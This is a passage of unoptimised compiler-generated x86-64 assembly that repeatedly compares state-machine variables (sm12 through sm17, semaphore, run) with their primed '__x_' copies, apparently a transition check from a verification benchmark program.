cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_425: ## in Loop: Header=BB1_70 Depth=1
movq _sm12_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm12_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_430
## %bb.426: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_429
## %bb.427: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_429
## %bb.428: ## in Loop: Header=BB1_70 Depth=1
movq _sm12_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_430
LBB1_429: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $12, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_430: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_433
## %bb.431: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $12, (%rax)
jne LBB1_433
## %bb.432: ## in Loop: Header=BB1_70 Depth=1
movq _sm12_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm12_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_433: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_437
## %bb.434: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm12_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_437
## %bb.435: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $12, (%rax)
jne LBB1_437
## %bb.436: ## in Loop: Header=BB1_70 Depth=1
movq _sm12_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_437: ## in Loop: Header=BB1_70 Depth=1
movq _sm13_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_439
## %bb.438: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm13_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm13_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_441
LBB1_439: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm13_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_441
## %bb.440: ## in Loop: Header=BB1_70 Depth=1
movq _sm13_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_441: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm13_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_443
## %bb.442: ## in Loop: Header=BB1_70 Depth=1
movq _sm13_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_444
LBB1_443: ## in Loop: Header=BB1_70 Depth=1
movq _sm13_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm13_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_444: ## in Loop: Header=BB1_70 Depth=1
movq _sm13_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_446
## %bb.445: ## in Loop: Header=BB1_70 Depth=1
movq _sm13_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm13_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_446: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm13_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_449
## %bb.447: ## in Loop: Header=BB1_70 Depth=1
movq _sm13_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_449
## %bb.448: ## in Loop: Header=BB1_70 Depth=1
movq _sm13_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm13_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_449: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm13_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_453
## %bb.450: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_453
## %bb.451: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_453
## %bb.452: ## in Loop: Header=BB1_70 Depth=1
movq _sm13_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_453: ## in Loop: Header=BB1_70 Depth=1
movq _sm13_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm13_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_458
## %bb.454: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_457
## %bb.455: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_457
## %bb.456: ## in Loop: Header=BB1_70 Depth=1
movq _sm13_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_458
LBB1_457: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $13, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_458: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_461
## %bb.459: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $13, (%rax)
jne LBB1_461
## %bb.460: ## in Loop: Header=BB1_70 Depth=1
movq _sm13_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm13_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_461: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_465
## %bb.462: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm13_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_465
## %bb.463: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $13, (%rax)
jne LBB1_465
## %bb.464: ## in Loop: Header=BB1_70 Depth=1
movq _sm13_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_465: ## in Loop: Header=BB1_70 Depth=1
movq _sm14_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_467
## %bb.466: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm14_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm14_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_469
LBB1_467: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm14_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_469
## %bb.468: ## in Loop: Header=BB1_70 Depth=1
movq _sm14_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_469: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm14_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_471
## %bb.470: ## in Loop: Header=BB1_70 Depth=1
movq _sm14_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_472
LBB1_471: ## in Loop: Header=BB1_70 Depth=1
movq _sm14_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm14_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_472: ## in Loop: Header=BB1_70 Depth=1
movq _sm14_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_474
## %bb.473: ## in Loop: Header=BB1_70 Depth=1
movq _sm14_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm14_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_474: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm14_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_477
## %bb.475: ## in Loop: Header=BB1_70 Depth=1
movq _sm14_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_477
## %bb.476: ## in Loop: Header=BB1_70 Depth=1
movq _sm14_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm14_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_477: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm14_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_481
## %bb.478: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_481
## %bb.479: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_481
## %bb.480: ## in Loop: Header=BB1_70 Depth=1
movq _sm14_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_481: ## in Loop: Header=BB1_70 Depth=1
movq _sm14_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm14_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_486
## %bb.482: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_485
## %bb.483: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_485
## %bb.484: ## in Loop: Header=BB1_70 Depth=1
movq _sm14_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_486
LBB1_485: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $14, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_486: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_489
## %bb.487: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $14, (%rax)
jne LBB1_489
## %bb.488: ## in Loop: Header=BB1_70 Depth=1
movq _sm14_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm14_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_489: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_493
## %bb.490: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm14_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_493
## %bb.491: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $14, (%rax)
jne LBB1_493
## %bb.492: ## in Loop: Header=BB1_70 Depth=1
movq _sm14_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_493: ## in Loop: Header=BB1_70 Depth=1
movq _sm15_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_495
## %bb.494: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm15_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm15_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_497
LBB1_495: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm15_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_497
## %bb.496: ## in Loop: Header=BB1_70 Depth=1
movq _sm15_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_497: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm15_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_499
## %bb.498: ## in Loop: Header=BB1_70 Depth=1
movq _sm15_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_500
LBB1_499: ## in Loop: Header=BB1_70 Depth=1
movq _sm15_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm15_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_500: ## in Loop: Header=BB1_70 Depth=1
movq _sm15_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_502
## %bb.501: ## in Loop: Header=BB1_70 Depth=1
movq _sm15_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm15_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_502: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm15_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_505
## %bb.503: ## in Loop: Header=BB1_70 Depth=1
movq _sm15_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_505
## %bb.504: ## in Loop: Header=BB1_70 Depth=1
movq _sm15_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm15_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_505: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm15_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_509
## %bb.506: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_509
## %bb.507: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_509
## %bb.508: ## in Loop: Header=BB1_70 Depth=1
movq _sm15_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_509: ## in Loop: Header=BB1_70 Depth=1
movq _sm15_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm15_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_514
## %bb.510: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_513
## %bb.511: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_513
## %bb.512: ## in Loop: Header=BB1_70 Depth=1
movq _sm15_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_514
LBB1_513: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $15, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_514: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_517
## %bb.515: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $15, (%rax)
jne LBB1_517
## %bb.516: ## in Loop: Header=BB1_70 Depth=1
movq _sm15_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm15_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_517: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_521
## %bb.518: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm15_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_521
## %bb.519: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $15, (%rax)
jne LBB1_521
## %bb.520: ## in Loop: Header=BB1_70 Depth=1
movq _sm15_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_521: ## in Loop: Header=BB1_70 Depth=1
movq _sm16_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_523
## %bb.522: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm16_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm16_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_525
LBB1_523: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm16_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_525
## %bb.524: ## in Loop: Header=BB1_70 Depth=1
movq _sm16_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_525: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm16_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_527
## %bb.526: ## in Loop: Header=BB1_70 Depth=1
movq _sm16_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_528
LBB1_527: ## in Loop: Header=BB1_70 Depth=1
movq _sm16_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm16_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_528: ## in Loop: Header=BB1_70 Depth=1
movq _sm16_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_530
## %bb.529: ## in Loop: Header=BB1_70 Depth=1
movq _sm16_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm16_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_530: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm16_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_533
## %bb.531: ## in Loop: Header=BB1_70 Depth=1
movq _sm16_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_533
## %bb.532: ## in Loop: Header=BB1_70 Depth=1
movq _sm16_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm16_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_533: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm16_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_537
## %bb.534: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_537
## %bb.535: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_537
## %bb.536: ## in Loop: Header=BB1_70 Depth=1
movq _sm16_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_537: ## in Loop: Header=BB1_70 Depth=1
movq _sm16_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm16_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_542
## %bb.538: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_541
## %bb.539: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_541
## %bb.540: ## in Loop: Header=BB1_70 Depth=1
movq _sm16_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_542
LBB1_541: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $16, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_542: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_545
## %bb.543: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $16, (%rax)
jne LBB1_545
## %bb.544: ## in Loop: Header=BB1_70 Depth=1
movq _sm16_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm16_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_545: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_549
## %bb.546: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm16_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_549
## %bb.547: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $16, (%rax)
jne LBB1_549
## %bb.548: ## in Loop: Header=BB1_70 Depth=1
movq _sm16_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_549: ## in Loop: Header=BB1_70 Depth=1
movq _sm17_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_551
## %bb.550: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm17_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm17_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_553
LBB1_551: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm17_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_553
## %bb.552: ## in Loop: Header=BB1_70 Depth=1
movq _sm17_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
